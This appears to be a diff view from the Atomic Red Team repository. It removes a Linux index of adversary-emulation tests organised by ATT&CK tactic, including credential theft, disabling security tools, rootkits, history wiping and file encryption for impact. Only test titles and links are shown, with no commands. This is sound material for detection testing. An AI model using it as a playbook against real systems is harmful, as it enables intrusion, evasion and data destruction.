- T1026 Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1095 Non-Application Layer Protocol](../../T1095/T1095.md)
- Atomic Test #1: ICMP C2 [windows]
- Atomic Test #2: Netcat C2 [windows]
- Atomic Test #3: Powercat C2 [windows]
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1219 Remote Access Software](../../T1219/T1219.md)
- Atomic Test #1: TeamViewer Files Detected Test on Windows [windows]
- Atomic Test #2: AnyDesk Files Detected Test on Windows [windows]
- Atomic Test #3: LogMeIn Files Detected Test on Windows [windows]
- [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- Atomic Test #2: XOR Encoded data. [windows]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071.001 Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #1: Malicious User Agents - Powershell [windows]
- Atomic Test #2: Malicious User Agents - CMD [windows]
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# exfiltration
- [T1020 Automated Exfiltration](../../T1020/T1020.md)
- Atomic Test #1: IcedID Botnet HTTP PUT [windows]
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows]
- Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux]
- Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
- Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1567.002 Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1020.001 Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# initial-access
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1133 External Remote Services](../../T1133/T1133.md)
- Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin priviliges [windows]
- T1566 Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1566.001 Spearphishing Attachment](../../T1566.001/T1566.001.md)
- Atomic Test #1: Download Phishing Attachment - VBScript [windows]
- Atomic Test #2: Word spawned a command shell and used an IP address in the command line [windows]
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
atomics/Indexes/Indexes-Markdown/linux-index.md
-728
View File
@@ -1,728 +0,0 @@
# Linux Atomic Tests by ATT&CK Tactic & Technique
# credential-access
- [T1003.008 /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md)
- Atomic Test #1: Access /etc/shadow (Local) [linux]
- Atomic Test #2: Access /etc/passwd (Local) [linux]
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.003 Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1552.005 Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.007 Container API](../../T1552.007/T1552.007.md)
- Atomic Test #1: ListSecrets [macos, linux]
- Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux]
- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
- Atomic Test #1: SSH Credential Stuffing From Linux [linux]
- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #2: Extract passwords with grep [macos, linux]
- Atomic Test #5: Find and Access Github Credentials [macos, linux]
- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1555.003 Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux [linux]
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.002 Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1110.001 Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad]
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
- Atomic Test #4: Password spray all Azure AD users with a single password [azure-ad]
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
- Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
- [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
- Atomic Test #1: Dump individual process memory with sh (Local) [linux]
- Atomic Test #2: Dump individual process memory with Python (Local) [linux]
- T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# collection
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1560.002 Archive via Library](../../T1560.002/T1560.002.md)
- Atomic Test #1: Compressing data using GZip in Python (Linux) [linux]
- Atomic Test #2: Compressing data using bz2 in Python (Linux) [linux]
- Atomic Test #3: Compressing data using zipfile in Python (Linux) [linux]
- Atomic Test #4: Compressing data using tarfile in Python (Linux) [linux]
- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
- T1123 Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1119 Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1115 Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1213.001 Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1530 Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1602 Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1602.002 Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1602.001 SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #3: X Windows Capture [linux]
- Atomic Test #4: Capture Linux Desktop using Import Tool [linux]
- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# privilege-escalation
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
- Atomic Test #1: At - Schedule a job [linux]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [linux, macos]
- Atomic Test #2: CreateCronjob [linux, macos]
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- [T1611 Escape to Host](../../T1611/T1611.md)
- Atomic Test #1: Deploy container using nsenter container escape [linux]
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
- [T1546.004 Unix Shell Configuration Modification](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# defense-evasion
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1027.001 Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1612 Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070.003 Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #2: Clear Bash history (echo) [linux]
- Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
- Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
- Atomic Test #5: Clear Bash history (truncate) [linux]
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
- Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
- Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos]
- Atomic Test #9: Disable Bash History Logging with SSH -T [linux]
- [T1070.002 Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- Atomic Test #1: rm -rf [macos, linux]
- Atomic Test #2: Overwrite Linux Mail Spool [linux]
- Atomic Test #3: Overwrite Linux Log [linux]
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.004 Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1578.001 Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1140 Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1610 Deploy Container](../../T1610/T1610.md)
- Atomic Test #1: Deploy container using nsenter container escape [linux]
- T1562.008 Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #1: Disable firewall [linux]
- [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #1: Disable syslog [linux]
- Atomic Test #2: Disable Cb Response [linux]
- Atomic Test #3: Disable SELinux [linux]
- Atomic Test #4: Stop Crowdstrike Falcon on Linux [linux]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1601.002 Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070.004 File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos]
- Atomic Test #3: Overwrite and delete a file with shred [linux]
- Atomic Test #8: Delete Filesystem - Linux [linux]
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.003 Impair Command History Logging](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.006 Indicator Blocking](../../T1562.006/T1562.006.md)
- Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
- Atomic Test #2: Logging Configuration Changes on Linux Host [linux]
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1553.004 Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #1: Install root CA on CentOS/RHEL [linux]
- Atomic Test #2: Install root CA on Debian/Ubuntu [linux]
- [T1222.002 Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [macos, linux]
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [macos, linux]
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [macos, linux]
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [macos, linux]
- Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
- Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
- Atomic Test #7: chown - Change file or folder mode ownership only [macos, linux]
- Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.004 Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1601 Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1599.001 Network Address Translation Traversal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1599 Network Boundary Bridging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
- T1601.001 Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1600.001 Reduce Key Space [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1036.003 Rename System Utilities](../../T1036.003/T1036.003.md)
- Atomic Test #2: Masquerading as Linux crond process. [linux]
- T1578.004 Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1014 Rootkit](../../T1014/T1014.md)
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- T1036.006 Space after Filename [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.003 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070.006 Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1600 Weaken Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# impact
- T1531 Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
- Atomic Test #1: Encrypt files using gpg (Linux) [linux]
- Atomic Test #2: Encrypt files using 7z (Linux) [linux]
- Atomic Test #3: Encrypt files using ccrypt (Linux) [linux]
- Atomic Test #4: Encrypt files using openssl (Linux) [linux]
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1561 Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
